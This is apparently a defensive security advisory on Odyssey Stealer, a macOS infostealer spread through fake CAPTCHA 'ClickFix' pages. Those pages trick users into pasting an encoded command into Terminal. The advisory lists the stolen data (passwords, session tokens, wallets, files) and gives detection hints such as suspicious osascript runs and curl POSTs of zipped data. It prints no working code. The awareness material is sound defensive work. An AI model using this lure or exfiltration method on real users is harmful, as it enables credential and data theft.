The Odyssey Stealer: A Growing Global Threat to macOS Users

The long-standing myth that macOS is “immune” to malware is once again being challenged by the rise of a highly active information-stealing malware (infostealer) known as Odyssey Stealer.

While macOS users have historically faced fewer threats than Windows users, recent telemetry data from early 2026 shows a sharp surge in Odyssey Stealer activity. What began as a localized threat in the U.S., France, and Spain has now evolved into a global campaign spanning North America, Latin America, Europe, Asia, and Africa.

How the Odyssey Stealer Works

Unlike traditional viruses that exploit software bugs, Odyssey Stealer relies on social engineering. It targets the human element rather than the machine’s code.

The “ClickFix” Trap

The primary delivery method is a deceptive technique called “ClickFix.” Attackers create fake CAPTCHA verification pages that impersonate legitimate security checks or software update prompts (such as fake Microsoft Teams or Homebrew pages).

Instead of just clicking a “I am not a robot” checkbox, the user is instructed to:

1. Copy a provided string of text (which is actually a Base64-encoded command).
2. Open the Terminal on their Mac.
3. Paste and execute the command.

By getting the user to run the command manually, the malware effectively bypasses many of the built-in browser and operating system security warnings that would normally block a direct file download.

What Is at Risk?

Odyssey Stealer is designed for one purpose: total data exfiltration. Once the command is executed, the malware quietly harvests:

• Credentials: Saved passwords from Chrome, Firefox, and Safari.
• Session Tokens: “Cookies” that allow attackers to bypass Multi-Factor Authentication (MFA) and log directly into active business accounts.
• Cryptocurrency Wallets: Data from over 100 browser extensions, including MetaMask, as well as desktop apps like Ledger Live.
• Sensitive Files: It scans Desktop and Documents folders for .pdf, .docx, .key, and .wallet files.

The Impact on Your Business

For businesses, the threat goes beyond a single infected laptop. Because infostealers capture session tokens, an attacker doesn’t even need a password to access your corporate environment.

The Reality Check: An attacker with a stolen session token can impersonate an employee on Slack, access internal AWS or Azure consoles, and move laterally through your network—all without triggering a “new login” alert.

How to Protect Your Team

Defending against Odyssey Stealer requires a shift from purely technical controls to user awareness.

• Educate on “Terminal Phishing”: Remind employees that no legitimate website (like a CAPTCHA or a software portal) will ever ask them to copy and paste code into their Terminal or Command Prompt.
• Enforce Managed Software: Ensure users only download tools from approved internal repositories or the official Mac App Store.
• Monitor for Anomalies: Security teams should look for unusual osascript (AppleScript) executions or suspicious curl POST requests sending zipped data to unknown IP addresses.
• Session Management: If a compromise is suspected, remember that a password reset is not enough. You must explicitly “Revoke all active sessions” in your SaaS platforms to invalidate stolen tokens.

The Bottom Line

The Odyssey Stealer is a reminder that as macOS adoption grows in the enterprise, so does the sophistication of the threats targeting it. By staying informed and training your team to spot these “verification” traps, you can keep your data and your business secure.